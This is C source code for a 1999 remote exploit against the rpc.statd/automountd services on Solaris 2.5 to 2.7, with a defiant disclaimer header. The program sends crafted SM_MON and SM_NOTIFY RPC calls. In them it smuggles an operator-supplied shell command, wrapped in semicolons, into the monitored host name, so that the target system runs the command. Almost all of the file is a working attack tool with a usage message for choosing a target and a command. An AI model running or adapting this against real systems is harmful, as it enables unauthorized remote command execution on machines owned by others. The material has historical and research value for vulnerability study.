/* 
 * Corruptio Optimi Pessima - "corruption of the best is worst of all" 
 * Released January 3, 1999
 * 
 * Remote Solaris 2.5, 2.5.1 stock, 2.5.1 patched, 2.6, 2.7
 * rpc.statd/automountd exploit
 *
 * Copyright (c) 1998-1999, Corruptio Optimi Pessima
 * All rights reserved
 *
 * DISCLAIMER:
 *
 * WE TAKE NO RESPONSIBILITY FOR WHAT ANYONE DOES WITH THIS CODE.
 * DO NOT BLAME US.  BLAME SUN.  
 *
 * ROOTSHELL.COM MAY NOT PUT THIS UP ON THEIR PAGE.  THIS IS EXPLICIT
 * INSTRUCTION THAT DOING SO VIOLATES OUR COPYRIGHT.  AND DON'T DELETE
 * THESE HEADERS AND POST IT LIKE YOU USUALLY DO.
 *
 * ANTIONLINE.COM AND ANTICODE.COM (OR ANY OTHER ANTIONLINE AFFILIATE)
 * MAY NOT USE OR DISTRIBUTE THIS EXPLOIT.  AND LIKE ROOTSHELL, DELETING
 * HEADERS IS PATHETIC.
 *
 * Notes: Compile with -DUSESPRINTF if you are on a Solaris 2.5.1 or
 *        below machine.
 *
 */

#include <stdio.h> 
#include <unistd.h> 
#include <sys/types.h>
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <netdb.h> 
#include <rpc/rpc.h>
#include "sm_inter.h" 

#define MAX_SIZE			1024
#define AUTOFS_PROG			100099
#define AUTOFS_MOUNT			1

void
usage(int argc, char *argv[])
{
  printf("\nUsage: %s address cache command type [port]\n\n", argv[0]);
  printf("Further help:\n\n");
  printf("%-10s %-4s %-4s\n", "address", "-", "system address");
  printf("%-10s %-4s %-4s\n", "cache", "-", "system hostname");
  printf("%-10s %-4s %-4s\n", "command", "-", "execute this command");
  printf("%-10s %-4s %-4s\n", "type", "-", "0: Solaris 2.5.1 stock,");
  printf("%-15s %s\n", " ", "1: Solaris 2.5.1 patched, 2.6 & 2.7");
  printf("%-10s %-4s %-4s\n\n", "port", "-", "optional port to bypass portmapper");
  exit(-1);
}

int
main(int argc, char *argv[])
{
  struct mon monr;
  struct timeval tv;
  struct status stat;
  struct hostent *he;
  struct sockaddr_in sock;

  CLIENT *clnt;
  enum clnt_stat ret;
  char buffer[MAX_SIZE];
  int sockfd = RPC_ANYSOCK;

  if (argc <= 4)
    usage(argc, argv);

  memset(buffer, 0, sizeof(buffer));
  memset(&monr, 0, sizeof(struct mon));
  memset(&stat, 0, sizeof(struct status));

  monr.mon_id.my_id.my_name = argv[2];
  monr.mon_id.my_id.my_prog = (unsigned long)AUTOFS_PROG;
  monr.mon_id.my_id.my_proc = (unsigned long)AUTOFS_MOUNT;

  stat.state = 0;

  if (atoi(argv[4]) != 0 && atoi(argv[4]) != 1)
    usage(argc, argv);

  if (atoi(argv[4]) == 0)
  {
#   ifndef USESPRINTF
    snprintf(buffer, (sizeof(buffer)-1), ";%s;", argv[3]);
#   else
    sprintf(buffer, ";%s;", argv[3]);
#   endif
    monr.mon_id.my_id.my_vers = (unsigned long)1; 
    monr.mon_id.mon_name = buffer;
    stat.mon_name = buffer;
  } else {
    monr.mon_id.my_id.my_vers = (unsigned long)2; 
    monr.mon_id.mon_name = argv[3];
    stat.mon_name = argv[3];
  }

  he = gethostbyname(argv[1]);

  if (he == NULL)
  {
    printf("Unable to resolve the address \"%s\"!\n", argv[1]);
    exit(-1);
  }

  sock.sin_family = AF_INET;
  sock.sin_addr.s_addr = *(u_long *)he->h_addr;

  if (argc != 6)
    sock.sin_port = 0;
  else
    sock.sin_port = atoi(argv[5]);

  tv.tv_sec = 30;
  tv.tv_usec = 0;

  if ((clnt = clntudp_create(&sock, SM_PROG, SM_VERS, tv, &sockfd)) == NULL)
  {
    clnt_pcreateerror("clnt_create");
    exit(-1);
  }

  ret = clnt_call(clnt, SM_MON, xdr_mon, (char *)&monr, xdr_void, NULL, tv);

  if (ret != RPC_SUCCESS)
  {
    clnt_perror(clnt, "clnt_call");
    exit(-1);
  } else
    printf("SM_MON: %d\n", ret);

  ret = clnt_call(clnt, SM_NOTIFY, xdr_status, (caddr_t) &stat, xdr_void,
          NULL, tv);

  if (ret != RPC_SUCCESS)
  {
    clnt_perror(clnt, "clnt_call");
    exit(-1);
  } else
    printf("SM_NOTIFY: %d\n", ret);

  clnt_destroy(clnt);
  exit(0);
}
